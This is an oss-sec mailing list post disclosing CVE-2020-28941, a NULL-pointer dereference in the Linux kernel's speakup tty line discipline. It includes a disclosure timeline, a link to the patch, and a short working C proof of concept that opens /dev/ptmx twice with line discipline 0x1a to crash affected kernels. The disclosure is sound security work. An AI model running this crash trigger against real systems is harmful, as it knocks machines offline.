oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close

From: Marcus Meissner <meissner () suse de>
Date: Thu, 19 Nov 2020 17:25:08 +0100
Hi,

Mitre has assigned CVE-2020-28941 to this issue.

Ciao, Marcus
On Thu, Nov 19, 2020 at 10:46:59AM +0800, Shisong Qin wrote:

Hi,

Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty device and use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and in the second close would try to
dereference the "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    int disc = 0x1a;
    int fd = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd, 0x5423, &disc);
    int fd2 = open("/dev/ptmx", O_RDWR, 0);
    ioctl(fd2, 0x5423, &disc);
    return 0;
}

After the process return, it seems the automated calling to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1

Timeline:
* 2020/11/10 - Vulnerability reported to security () kernel org
* 2020/11/11 - Vulnerability confirmed, and reported to
linux-distros () vs openwall org.
* 2020/11/19 - Vulnerability opened.

Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University


-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 
53-432,,serv=loki,mail=wotan,type=real <meissner () suse de>
Previous By Date Next
Previous By Thread Next

Current thread: